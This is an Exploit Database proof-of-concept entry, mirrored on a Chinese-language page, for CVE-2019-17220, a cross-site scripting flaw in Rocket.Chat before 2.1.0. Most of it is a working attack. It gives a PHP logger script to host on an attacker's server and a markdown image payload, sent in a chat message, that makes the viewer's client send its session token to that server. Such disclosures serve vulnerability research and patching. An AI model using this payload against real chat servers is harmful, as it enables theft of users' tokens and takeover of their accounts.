Rocket.Chat 2.1.0 – Cross-Site Scripting

• Exploit Database
• 32 阅读

• 作者： 3H34N
  日期： 2019-10-23
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47537/

• # Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
  # Author: 3H34N
  # Date: 2019-10-22
  # Product: Rocket.Chat
  # Vendor: https://rocket.chat/
  # Vulnerable Version(s): Rocket.Chat < 2.1.0
  # CVE: CVE-2019-17220
  # Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)
  
  # PoC
  # 1. Create l33t.php on a web server
  
  <?php
  $output = fopen("logs.txt", "a+") or die("WTF? o.O");
  $leet = $_GET['leet']."\n\n";
  fwrite($output, $leet);
  fclose($output);
  ?>
  
  # 2. Open a chat session
  # 3. Send payload with your web server url
  
  ![title](http://10.10.1.5/l33t.php?leet=+`{}token`)
  
  # 4. Token will be written in logs.txt when target seen your message.